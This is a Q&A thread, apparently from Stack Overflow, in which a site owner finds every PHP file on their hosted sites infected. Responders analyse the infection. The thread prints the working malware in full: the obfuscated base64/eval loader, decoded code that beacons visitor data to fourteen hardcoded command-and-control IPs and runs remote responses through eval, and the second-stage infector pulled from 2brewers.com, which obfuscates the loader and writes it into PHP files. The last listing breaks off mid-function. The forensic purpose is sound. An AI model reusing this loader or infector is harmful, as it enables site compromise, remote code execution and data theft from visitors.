Rohan
Rohan

Reputation: 881

Is my website possibly being hacked?

I might be insane to write this here, but I am just too scared as of now. There are 2 websites that I have hosted on iPage.

All the PHP pages across both my websites were modified early this morning around 9AM and all of them have the following prefix

<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0poVjFsblMwTkdiV1JYTldwa1IyeDJZbXc1YkdWSGJIcGtTRTF2U1d0a2JHUkZNV2hpVjBWcFMxTnNOMGxEUW0xa1Z6VnFaRWRzZG1KcFFuUmlNbEptV1RJNWRVdERVbWxrVjFsd1pUTk9NR05zT1hCamJWWjNZa2RHYWxwVFoybFFSMHAyV2tockswbHBkMmxRUjBwMldraHJLMGxwZDJ0WmJsWnRURU5TYW1KdVVtWmhRMnMzWVZkWlowdERVbXBpYmxKbVlVTkJPVkJUUVhoTFUwSTNTa2RLTVZwcFFUbEpTRTR3WTJ3NWNHTnRWbmRpUjBacVdsTm5hVkJIU25aYVNHc3JTV2wzYVZCSFNuWmFTR3NyU1dsQmRVbElUakJqYld4M1l6SjRhR015YUd4amVXZHJXREZPUmxWc1drWlZiSE5wV2pJNWRscERTbVJMVTNkcldXNVdiVXRVYzJkamJWWXdaRmhLZFVsRFVtbGtWMWszWmxoT01HTnNPWEJqYlZaM1lrZEdhbHBUWjJsUVF6bHBZakpTTlZCcFNYTkphbmQyV1cwNWEyVlVOR2xNUTFKcFpGZFpjMHBIVG5Wa1JqbHZTMVIwY0ZwcFFXOUtSMDUxWkVZNWIwbEVNRGxKUkVWd1NVaHphMWx1Vm0xSlJEQm5Zek5TZVZneWJIbGFXRUp6V1ZkT2JFdERTVGhNTWtwMldraHJLMGxwZUhwa1NFcHdZMGhPYzFsWVRtOWFXRTF2U2tZNVZGSldTbGRTVmtwaVNXMWtkbUl5VVdsWVUydDFTV3AzZGxsdE9XdGxWRFJwVEVOU2FXUlhXWEJQZVVKNVdsaFNNV050TkdkS1Iwb3hXbXAwT1dOdFZqQmtXRXAxU1VOU2FXUlhXVGRtVjFveFltMU9NR0ZYT1hWSlJ6bDNXVmMxY21GVFoydFpibFp0UzFoemExb3pjR1phVTBFNVNVZGFhR0pJVG14UGVWSnZXREozWjFCVFFtOWFWMFpyV2xoS2VsZ3llSEJqTTFGdlMxUjBjRnBwUVc5aFZ6Vm1XVmhLZVZsWWEyOUphMDUyWW01U2JHSnVVWFJTVnpWcVlqSlNjR0p0WXpaSlIyUTJZVmhCYVV4RFFXdGhSamx6UzFOcloyVjVRV3RhTTNCbVdsTkJPVWxJVW5sa1YxVTNabGRzYlVsRFoydGFNM0JtV2xOc04wcElVblJqUjFwMVdWY3hiRWxFTUdka1IxWjBZMGMxYUdKVFoybE1NMUowWTBOSmMwbERTa2RVTURocFMxUjBiV0ZYZUd4WU0wSXhaRVk1YW1JeU5UQmFWelV3WTNsbmEyUkhNWGRhYlRWb1lsZFZjMGxEVW1sa1YxbHdUM2xTTmxwRFFUbEpSMlEyWWpOQ2JHSnBaMnRrUnpGM1dtMDFhR0pYVlhOSlEwcDVTV2xyTjBwSFRuWmlibEpzWW01U2VrbEVNR2RhTTNCNVdsZEdhMHREVWpaYVEzZG5UVlJCZDAxRVFYZE5SRUZ3VDNsU2FtSXlOVEJhVnpVd1kzbEJPVWxITVhaYVJqbHFZakkwYjBwSFRuWmlibEpzWW01U2VrdFVkRzVsYlU1ellqTk9iRXREVWpaYVEyczNaRmMxYzJGWE5YSkxRMUl3WWxoQ2JXSnRSblJhVTJzM1NrZE9kbUp1VW14aWJsSjZTVVF3WjFvemNHeGliVTUyV2tkVmIwcEhUblppYmxKc1ltNVNla3RVZERsSlIxWnpZekpWWjJWNVVtcGlNalV3V2xjMU1HTjVRVGxKUnpGMldrWTVhbUl5Tkc5S1Iwb3hXbWxyTjJaVFVuTmFWelJuVUZOQ2VtUklTbk5hVnpSdlNrZE9kbUp1VW14aWJsSjZTMVIwYjFwWFJtdGFXRWx2U1d0T2RtSnVVbXhpYmxGMFZFZFdkVm96VW05UGFVRnBUR2xTYzFwWE5IQlBNMHBzWkVoV2VXSnBaMnRaTWpsMVpFZFdkV1JJVFhCUE16Qm5XbTVXZFZrelVuQmlNalJuVWpKV01GUlhSblJaVTJkd1pYbFNkR0l6VW05YVdFbG5VRk5CYVdRelpETk1hbXMxV1cxc01HTjVOV3BpTWpCcFR6TktiR1JJVm5saWFVRnJZbGM1TUdGSFZubFBNekYyV1d3NWVtUkhSbmxrUTJkcFlqTkNhR0p0ZEhCSmFXczNXbTVXZFZrelVuQmlNalJuV1Zkb2JXUlhVbTFpUjFvMldrZG9iV0ZJVFc5S1NFSm9TMWh6YTJKWFJuUlpVMEU1U1VWa2JHUkZNV2hpVjBWdlMxUnphMXB0YkhOYVUwRTVTVWhXZVdKSFZuVlpNamxyV2xOb1psZ3dXa3BVUlZabVdIbHJOMkZYV1dkTFIyeDZZekpXTUV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldEQm9VRlV4VVdsWVUydHdaWGxTYjJJelRqQkpSREJuU2tZNVZGSldTbGRTVmtwaVNXdG9WVlpHUW1aVFJUbFVWa05LWkU4ek1HZGFWM2g2V2xOQ04wcEhhSFpqTTFGblVGTkJhVWxxZERsaFYxbG5TMGRzZW1NeVZqQkxRMUptVlRCV1UxWnJWbE5YZVVwVFVsVXhVRlpGVm1aUlZWSkZWV2xLWkV0VGJEZEtSMngzU1VRd1owcEdPVlJTVmtwWFVsWktZa2xzU2taVVZUbFZVbFk1UWxKRlVsTkpiREEzWmxOQ2JHSklUbXhKU0hOcllWaEJaMUJUUVdsSmFuUTVZVmRaWjB0SGJIcGpNbFl3UzBOU1psVXdWbE5XYTFaVFYzbEtTVlpHVWxGWU1VcEdVbXRXVTFKV1NXbFlVMnR3WlhsU2VWcFhXV2RRVTBJeFkyMTRiR0p0VG5aYVIxVnZTa1k1VkZKV1NsZFNWa3BpU1d0b1ZWWkdRbVpWYTFaSFVsWktSbFZwU21STFZIUTVTVWRXYzJNeVZXZGxlVko1V2xkWloxQlRRV2xKYW5RNVlWZFpaMHRIYkhwak1sWXdTME5TWmxVd1ZsTldhMVpUVjNsS1NWWkdVbEZZTVZaVVVsWktabEZWWkVaVWJGRnBXRk5yY0dWNVVqRlpVMEU1U1VoV2VXSkhWblZaTWpscldsTm9lbVJJU2pCaU1uaDJaREpXZVV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldERldWRkpXU21aUlZXUkdWR3hSYVZoVGEzQlBNekJuV2xkNGVscFRRamRLU0Zab1NVUXdaMGxwU1RkbVYyeHRTVU5vY0dNelRteGtRMmRyV0RGT1JsVnNXa1pWYkhOcFZWWldSbFZzYkdaVk1WSlRVMVUxU0Vsc01IQkxXSE5yWTFoTloxQlRRakZqYlhoc1ltMU9kbHBIVlc5S1JqbFVVbFpLVjFKV1NtSkpiRVpXVWxaS1dsZ3hUbFZWYTJ4UFVubEtaRXRVZERsSlIxWnpZekpWWjJWNVVuaGplVUU1U1VOSmFVOHpNR3RrV0VweldIcEJaMUJUUVdsaFNGSXdZMFJ2ZGt4NVNXZE1hVUZyWTBkRk4wcElWbmxpUmpoNFNVUXdaMGxwT1hGYVYxSndURzVDYjJORU9USmFXRXA2WVZjNWRWQlVRVFZQVkVWdFlsYzVNR0ZIVm5sUVUwbG5UR2xTZEZsWE1XaEpRelJuU1dsYWJXRlhlR3hRVTBsblRHbEJhMXB0YkhOYVUwRjFTVU5KYldGSE9YcGtSREJwU1VNMFowcEhhSFpqTTFGblRHbEJhVXB0YkhkUVUwbG5UR2xCYTJGWVFXZE1hVUZwU201S2JGcHFNR2xKUXpSblNraEtiRnBwUVhWSlEwbHRaRmRGT1VscFFYVktTRlpvU1VNMFowbHBXbmhqZWpCcFNVTTBaMHBJUm5wUGVWSXdZMjVyWjFCVFFqQmpibFpzVHpKc2JVdERRbTFrVnpWcVpFZHNkbUpzT1d4bFIyeDZaRWhOYjBsdFRqRmpiWGhtWVZjMWNHUkRTWEJKUTJ3M1NrZE9iMGxFTUdkWk0xWjVZa1k1Y0dKdGJEQkxRMUl4WTIxNFprMURRWFZKUTFJeFkyMTRaazFUYXpkWk0xWjVZa1k1ZWxwWVVuWmpTRkZ2U2tkT2IweERRa1JXVmtwTlZERkNWVmd4U2taV1JsWlRWR3hTVTFGVk5WUlNhMVpUVEVOQmVFdFVkR3BrV0VweldETk9iR1JIT1hka1EyZHJXVEpuYzBsRlRsWlZhM2hRVlVaU1psWkZiRTVTVlRsV1ZrTjNaMDE1YXpkS1NGWnpaRU5CT1VsSVVubGhWekJ2V1ROV2VXSkdPV3hsUjFacVMwTlNhbUZEYTNCUGVWSXdZMjVyWjFCVFFtMVpWM2g2V2xSME9VbEhiRzFKUTJkdllWYzFjRmd5Wkd4a1EyZHBXVmQ0YzJJelpHWmtXRXB6V0RKYWRtTkhWblZKYVd0d1NVTlpiVWxEVWpCamJtdHdTVWh6YTJSWGVEQkpSREJuWkVoS2NHSlRhRUZhYld4eldsWTVibHBZVW1aWk1qbDFaRWRXZFdSSVRXOUtTRlo1WWtZNGQwbEROR2RLU0ZaNVlrWTRlRXRUYXpkS1NGSjVaVk5CT1VsSFdtaGlTRTVzVHpNeGNGcHBaMnRrU0VvMVMxaHphMXB1UVdkUVUwSnRZekk1YW1FeU9YZGFWelJ2U2toQ2FFeERRVFJOUTNkblNrZFdlV050TlhaTVEwRnJXbGhLZVdNelVubE1RMEY2VFVOck4yRlhXV2RMUTFKdFkwTnJaMlY1VW5aa1dGRm5VRk5CYVZJd1ZsVkpRMUl4WTIxNFprMVRRa2xXUmxKUlRIcEZkVTFHZUhsWVJ6UnBUM2xTZG1SWVVXZE1hakJuU1d0b2RtTXpVVFpKUTFKM1dWWjRlVmhITkdsUGVWSjJaRmhSWjB4cU1HZEphMDUyWW0wMWJGa3pVbkJpTWpRMlNVVk9jMkl6VG14WVNFcGpZbXg0ZVZoSE5HbFBNbG96WTIxc01GcFRaMnRhYmtGelNVTlNkbVJZVVhCUGVWSjVXbGhSWjFCVFFXbEphblF6WVVkc2MxcFRRVzlKVjFwc1lqSlpiMHBIV25kTFUydG5aWGxTZVZwWVVXZEpRelE1U1VOQ2JWb3lWakJqZVdkcldtNUJjMGxFUlhsUFEyczNabGRhYW1KSE9YcGFVMmRyV201QmNFOTVVakZpU0ZGblVGTkNNR050YkhSTFNFNHhXVzVPTUdOcFoydGpiVll3VEVOQ2VtUklTbmRpTTAxdlNraEtiR1JEZDJkSmJIaDVXRWMxWTJOc2VIVkphV3RuUzNsQk1FdFRhemRtV0RCblNVZHNiVWxEYUhwa1NFcDNZak5OYjBwSVZuTmtRM2RwV2xoYWFHSkRTWEJKUTBVNVVGTkNiVmxYZUhwYVUydzNTa2h2WjFCVFFucGtTRXB3WTBoT2MxbFlUbTlhV0Uxdll6TlNlVmd6U214alIzaG9XVEpWYjBsdFZqSlpWM2RwVEVOSmFVeERVakZpU0ZGd1MxUnpaMXBZV21oaVEyZHJaV2xyTjBsSFZqUmhXRkZ2UzFSME9XRlhXV2RMU0U0d1kyNUNkbU41WjJ0a1YzZ3dURU5LYkZsdE5XaEphV3RuU1ZRd09VbEhXbWhpU0U1c1MxaHphMWd4VGtaVmJGcEdWV3h6YVZveU9YWmFRMHBrU1VRd1oyTXpVbmxZTTBwc1kwZDRhRmt5Vlc5SmJWWnBZbTFGYVV4RFNXbE1RMUl4WWtoUmNFOHpTbXhrU0ZaNVltbENNR051Vm14UE16RnNZa2hPYkVsSWRIbGFXRkl4WTIwMFoxcHRSbk5qTWxVM1psZ3dhMXB0UmpCaFIxWjVUV3gwWkVsRU1HZEphbU0wVEdwUk1reHFSVE5OZVRSNFRrTkpOMHBIV21oa1IyaHNZMnBLWWxoVFFUbEpRMGw0VG5wWmRVOVROSGxOVkdkMVRWUnJlRWxxYzJ0YWJVWXdZVWRXZVUxc2RHUkpSREJuU1dwcmVFeHFTWGxQUXpSNFRsUlJkVTFxVlRCSmFuTnJXbTFHTUdGSFZubE5iSFJrU1VRd1owbHFZek5NYW1kNFRHcEpNRTFUTkhsT1ZFMXBUM2xTYlZsWVVtOWFXRWw1VnpFd1oxQlRRV2xOVkdjd1RHcG5lVXhxUlhoT2VUUjRUVlJCYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTVETkhsTlJFbDFUMVJOYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTFxVVRWTWFsVTBUR3BGZWs1VFNUZEtSMXBvWkVkb2JHTnFTbUpZVTBFNVNVTkplRTU2V1hWUFV6UjVUa1JGZFUxVVZYZEphbk5yV20xR01HRkhWbmxOYkhSa1NVUXdaMGxxVVRKTWFrMHpUR3BGTWs5VE5ERk9hVWszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RCT2FUUjZUVU0wTUUxVE5EVlBVMGszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RWT1F6UjVUa1JKZFUxcVZURk1hazB4U1dwemExcHRSakJoUjFaNVRXeDBaRWxFTUdkSmFrVXpUME0wZUU1cVNYVk5WRWsxVEdwSmVVMTVTVGRLUjFwb1pFZG9iR05xU21KWVUwRTVTVU5KTTA5RE5EQk9lVFI0VDBSUmRVMTZUV2xQZVZKdFdWaFNiMXBZU1hsWE1UQm5VRk5CYVUxNlJYVk5WR2N3VEdwSmVrNURORFZPYVVrM1l6Sm9NVnB0V25OYVUyZHJXbTFHTUdGSFZubE5hV3MzV20wNWVWcFhSbXBoUTJkcldtMUdNR0ZIVm5sTmFVSm9ZM2xCYTJSWVNYQmxNbXh0U1VObloxbFhhRzFrVjFKdFlrZGFObHBIYUcxaFNFMXZTa2hXZVV0VFFYQkpTSE5uV1c1S2JGbFhjMmRQTXpFNVpsRTlQU0lwS1RzZyIpKTsg")); ";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>

I tried reaching iPage support and they have no idea as to what has happened. They just created a support ticket for me which will be looked into within 48 hours!!

UPDATE

Got an email about the hack

From: poor victim [email protected]

Message: Why is this code on my server? why are you hacking my files??? this code points back to you!!! Prepare for a lawsuit

if (!function_exists("GetMama")){ function mod_con($buf){ str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) { $buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf); return $buf; }str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) { $buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf); return $buf; }return $buf; }function opanki($buf){ $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true; }if ($gz_e){ $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents); } else {$contents = mod_con($buf); }$len = strlen($contents);header("Content-Length: ".$len);return($contents); } function GetMama(){ $mother = "www.99bits.com";return $mother; }ob_start("opanki");function ahfudflfzdhfhs($pa){ $mama = GetMama();$file = urlencode(FILE);if (isset($_SERVER["HTTP_HOST"])){ $host = $_SERVER["HTTP_HOST"]; } else {$host = ""; }if (isset($_SERVER["REMOTE_ADDR"])){ $ip = $_SERVER["REMOTE_ADDR"]; } else {$ip = ""; }if (isset($_SERVER["HTTP_REFERER"])){ $ref = urlencode($_SERVER["HTTP_REFERER"]); } else {$ref = ""; }if (isset($_SERVER["HTTP_USER_AGENT"])){ $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"])); } else {$ua = ""; }if (isset($_SERVER["QUERY_STRING"])){ $qs = urlencode($_SERVER["QUERY_STRING"]); } else {$qs = ""; }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){ $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false; } if ((ini_get("allow_url_fopen")) && $try) { $ult = trim(@file_get_contents($url_0 . $url_1));$try = false; }if($try){ $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) { $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) { $ret .= fgets($fp, 128); }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4)); } } if (strpos($ult,"eval") !== false){ $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit(); }if (strpos($ult,"ebna") !== false){ $_SERVER["good"] = str_replace("ebna","",$ult);return true; }else {return false; } }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){ if ( ahfudflfzdhfhs($ur) ) { break ; } } }

Sent from (ip address): 64.118.163.18 (64.118.163.18) Date/Time: April 9, 2012 7:15 pm Coming from (referer): http://www.99bits.com/contact-us/ Using (user agent): Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19

Thanks to each one of you for all the help and knowledge. For some strange and unknown reason my blog was the targeted in this hack attempt. I've closed the blog for time being, until I can clean up all the files (as all my PHP files are infected).

Upvotes: 3

Views: 2412

Answers (4)

stewe
stewe

Reputation: 42612

In the current form the script has the following command-and-control servers ("c&c"):

$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";

The script randomizes the order of them on each run. Then it trys to send a GET request containing these variables

$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__

to the first c&c server, if the response does not contain eval or ebna (or the server is down) it trys the next c&c server and so on.

In case the c&c server returns: ebna <somestring>, <somestring> will be placed inside the body tag of your website. So the hacker can insert arbitrary html/js code.

In the other case where the c&c server returns eval <somestring>, <somestring> will be passed to eval(). That way the hacker can even execute arbitrary php code.

I managed to get the c&c server to return an eval response by just ommiting all url parameters, like this: http://<server-ip>/jedi.php, here is the response:

eval $try = true;
if (function_exists("curl_init")) {
    $ch = curl_init('http://2brewers.com/99.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    $try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
    $ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
    $try = false;
}
if ($try) {
    $fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
    if ($fp) {
        $out = "GET /99.txt HTTP/1.0\r\n";
        $out. = "Host: 2brewers.com\r\n";
        $out. = "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $ret = '';
        while (!feof($fp)) {
            $ret. = fgets($fp, 128);
        }
        fclose($fp);
        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
    }
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);

that loads and executes http://2brewers.com/99.txt, which looks like this:

function get_file_extension($file_name) {
    return substr(strrchr($file_name, '.'), 1);
}

function pass_gen($dol) {
    $source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $source[1] = "0123456789";
    $length = rand(5, 50);
    $passwordlen = intval($length) - 1;
    $use = implode("", $source);
    $max_num = strlen($use) - 1;
    $rp = '';
    for ($i = 0; $i < $passwordlen; $i++) {
        $x = rand(0, $max_num);
        $rp. = $use[$x];
    }
    if ($dol) {
        return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
    } else {
        return $source[0][rand(0, strlen($source[0]) - 1)].$rp;

    }
}

function GetMass($text, $code, $massname) {
    $a = str_split($text);
    foreach($a as $b) {
        $evmas[] = ord($b) + $code;
    }
    $z = $massname."= array('".implode("','", $evmas)."');";
    return $z;
}


function Codee($code) {


    $coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';

    $f1 = pass_gen(false);
    $coo = str_replace('F1', $f1, $coo);
    $v1 = pass_gen(true);
    $coo = str_replace('$v1', $v1, $coo);
    $v2 = pass_gen(true);
    $coo = str_replace('$v2', $v2, $coo);
    $v3 = pass_gen(true);
    $coo = str_replace('$v3', $v3, $coo);
    $v4 = pass_gen(true);
    $coo = str_replace('$v4', $v4, $coo);
    $v5 = pass_gen(true);
    $coo = str_replace('$v5', $v5, $coo);
    $v6 = pass_gen(true);
    $coo = str_replace('$v6', $v6, $coo);
    $v7 = pass_gen(true);
    $coo = str_replace('$v7', $v7, $coo);
    $v8 = pass_gen(true);
    $coo = str_replace('$v8', $v8, $coo);
    $v9 = pass_gen(true);
    $coo = str_replace('$v9', $v9, $coo);
    $v0 = pass_gen(true);
    $coo = str_replace('$v0', $v0, $coo);
    $mas1 = pass_gen(true);
    $coo = str_replace('$mas1', $mas1, $coo);
    $mas2 = pass_gen(true);
    $coo = str_replace('$mas2', $mas2, $coo);
    $mas3 = pass_gen(true);
    $coo = str_replace('$mas3', $mas3, $coo);
    $code1 = rand(1000, 10000);
    $coo = str_replace('$code1', $code1, $coo);
    $code2 = rand(1000, 10000);
    $coo = str_replace('$code2', $code2, $coo);
    $code3 = rand(1000, 10000);
    $coo = str_replace('$code3', $code3, $coo);

    for ($i = 0; $i < 3; $i++) {
        $code = base64_encode($code);
        $code = 'eval(base64_decode("'.$code.'")); ';
    }
    $code = base64_encode($code);


    $z = GetMass('eval', $code1, $mas1);
    $z. = GetMass('create_function', $code2, $mas2);
    $z. = GetMass('base64_decode', $code3, $mas3);
    $z. = $v0.'="'.$code.'";';
    $z. = $coo;
    return $z;

}

function modify($fname) {


    $tmp = file_get_contents($fname);
    $md_start = md5($tmp);

    chmod($fname, 0666);
    $md = md5($fname);



    $pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/<\?php[\s]*\?>/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pos = strpos($tmp, 'GetMama');
    $pos2 = strpos($tmp, 'god_mode_on');
    if (($pos === false) && ($pos2 === false)) {

        $code_t = 'if (!function_exists("GetMama")){  function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}}  if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
        $mama = 'wtf';
        $mama = $_SERVER["HTTP_HOST"];
        $code_t = str_replace('###', $mama, $code_t);
        $code = '<'.'?php ';

        $prob = rand(5, 500);

        for ($i = 0; $i < 700 + $prob; $i++) {
            $code = $code.' ';
        }


        $code_t = Codee($code_t);


        $code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;

        $f = fopen($fname, "w");
        fputs($f, $code);
        fclose($f);
    }
    chmod($fname, 0644);

}

function dir_num($dir) {
    global $fileslist;
    static $deep = 0;

    $odir = @opendir($dir);

    while (($file = @readdir($odir)) !== FALSE) {
        if ($file == '.' || $file == '..') {
            continue;
        } else {
            echo '. ';
            if (
